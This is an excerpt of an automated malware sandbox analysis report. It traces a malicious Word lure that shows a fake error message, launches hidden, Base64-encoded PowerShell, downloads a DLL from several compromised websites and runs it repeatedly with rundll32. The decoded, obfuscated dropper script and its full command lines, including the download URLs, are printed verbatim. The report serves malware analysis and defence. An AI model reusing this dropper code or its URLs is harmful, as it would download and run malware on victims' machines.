                      Source: rundll32.exe, 00000007.00000002.2095781612.00000000006BD000.00000004.00000020.sdmpBinary or memory string: PPTP00VMware_S
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0026C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0024C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0040C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_020AC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0023C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0021C4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_003DC4FF mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $95XUcD = [TYpE]("{0}{2}{4}{3}{1}" -f'SYSTe','CTORy','M','RE','.io.dI') ; sET-ItEm ('V'+'ariABLe'+':FIU') ( [typE]("{1}{4}{0}{6}{5}{3}{2}" -f'M.nET.SeR','sYst','TMaNAGer','N','E','I','vIcEPo'));$ErrorActionPreference = ('Si'+('le'+'n')+('t'+'lyC')+('o'+'nt')+('i'+'nue'));$Hc6c6uy=$I76C + [char](64) + $T36S;$V06B=('I3'+'9H'); (gcI ("VA"+"riAB"+"l"+"E:95"+"XuCd") ).VaLUe::"cReaT`Ed`IR`E`CTORY"($HOME + (('{0}C3re'+'5c3{0}'+'Di'+'_p'+'3'+'c9'+'{0}')-f [CHAR]92));$D15B=(('G2'+'8')+'O'); $fiu::"se`c`UrITYpRoTO`cOL" = (('T'+'ls')+'12');$R32F=('G'+('16'+'Z'));$C7zi9uu = ('O'+('_'+'5Z'));$W_1D=('E'+('19'+'T'));$W7io0wg=$HOME+(('{0}'+('C'+'3re5')+'c3'+'{'+'0}Di_p3c'+'9{'+'0}')-F[Char]92)+$C7zi9uu+('.d'+'ll');$H36A=('R'+('6_'+'O'));$Gr6x_h_=((']a'+'nw[3'+':/')+'/'+('p'+'etaf')+('ilm'+'.co')+'m'+('/w'+'p')+('-a'+'dm'+'in'+'/4m/@]')+'a'+('n'+'w[3'+'://gi'+'vi')+('ng'+'tha'+'nksd')+'ai'+'l'+('y.c'+'om/qlE/VeF/'+'@]a'+'n')+('w'+'[3://w')+('ap'+'.')+'zh'+('ong'+'l')+'i'+('sc'+'.c'+'o'+'m/wp-inc')+('lu'+'des'+'/Qr'+'yC')+'B/'+'@'+(']'+'anw')+('[3'+'s:/'+'/f'+'n'+'jbq.com/wp-i')+('nc'+'lude'+'s/')+('r'+'lR/@'+']anw['+'3s'+'://sak')+('h'+'isuh'+'an')+'i'+('n'+'arije')+('evik'+'a.')+('c'+'om/')+'w'+('p'+'-i')+('nc'+'lud')+('es'+'/CvG')+('U'+'jvE/@]'+'anw[3:'+'/')+('/'+'z'+'ieflix')+('.'+'tele'+'sk'+'o'+'pstore.co'+'m')+'/c'+'gi'+('-'+'bin')+('/G'+'t3S/@')+']'+'an'+('w['+'3')+'s:'+('//somanap.co'+'m/wp'+'-ad'+'m')+('in'+'/')+'P/')."rePL`AcE"(((']a'+'nw')+'['+'3'),([array]('sd','sw
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAA